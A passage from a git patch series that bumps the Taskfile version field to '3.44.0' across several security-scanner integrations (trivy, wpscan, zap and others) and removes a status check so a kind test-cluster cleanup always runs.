a/scanners/sslyze/Taskfile.yaml +++ b/scanners/sslyze/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/test-scan/Taskfile.yaml b/scanners/test-scan/Taskfile.yaml index 94836e9c0b..aa578895e3 100644 --- a/scanners/test-scan/Taskfile.yaml +++ b/scanners/test-scan/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/trivy-sbom/Taskfile.yaml b/scanners/trivy-sbom/Taskfile.yaml index 6d04aa8066..a63be5bb22 100644 --- a/scanners/trivy-sbom/Taskfile.yaml +++ b/scanners/trivy-sbom/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/trivy/Taskfile.yaml b/scanners/trivy/Taskfile.yaml index d35279a620..e59e71ce7a 100644 --- a/scanners/trivy/Taskfile.yaml +++ b/scanners/trivy/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/whatweb/Taskfile.yaml b/scanners/whatweb/Taskfile.yaml index efdee5d23c..0d5660bfad 100644 --- a/scanners/whatweb/Taskfile.yaml +++ b/scanners/whatweb/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/wpscan/Taskfile.yaml b/scanners/wpscan/Taskfile.yaml index 393c483381..a3af82c558 100644 --- a/scanners/wpscan/Taskfile.yaml +++ b/scanners/wpscan/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: diff --git a/scanners/zap-automation-framework/Taskfile.yaml b/scanners/zap-automation-framework/Taskfile.yaml index 5c62e34305..b3c480bcef 100644 --- a/scanners/zap-automation-framework/Taskfile.yaml +++ b/scanners/zap-automation-framework/Taskfile.yaml @@ -2,7 +2,7 @@ # # SPDX-License-Identifier: Apache-2.0 -version: "3" +version: "3.44.0" includes: scanner: From ce2db15b4ad21231fd327db737964ed4022146d4 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 15 Jul 2025 14:45:54 +0200 Subject: [PATCH 137/137] remove unneeded status check cleanup should always run Signed-off-by: Jannik Hollenbach --- Taskfile.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/Taskfile.yaml b/Taskfile.yaml index 3590ce6fc3..fe4fc68f80 100644 --- a/Taskfile.yaml +++ b/Taskfile.yaml @@ -87,8 +87,6 @@ tasks: cmds: - 'echo "Cleaning up testing environment"' - kind delete cluster --name testing-env - status: - - kind get clusters | grep -q 'testing-env' || exit 0 minio-port-forward: desc: "Port forward the MinIO service to access it locally"